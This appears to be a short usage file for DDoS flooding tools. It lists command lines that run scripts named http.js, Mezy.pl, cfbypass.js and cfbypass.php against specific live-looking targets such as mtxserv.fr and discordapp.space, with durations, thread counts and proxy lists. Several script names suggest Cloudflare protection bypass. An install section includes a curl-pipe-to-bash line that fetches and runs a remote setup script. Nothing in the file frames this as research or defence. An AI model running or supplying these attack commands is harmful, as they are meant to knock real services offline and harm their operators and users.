node http.js https://mtxserv.fr/ 60000 proxy.txt

perl Mezy.pl http://discordapp.space 1000 60 1.3.3.7

node cfbypass.js https://www.discordapp.space/login.php 99999 cfbypass.txt

php cfbypass.php http://discordapp.space/ 800 60 50 proxy.txt

--------------------------------------------------Install---------------------------------------------------------------
curl -sL https://deb.nodesource.com/setup_10.x | sudo -E bash -

sudo apt-get install nodejs

apt-get install php

apt-get install dstat

npm install https-proxy-agent

npm install ws

npm install request

npm install rs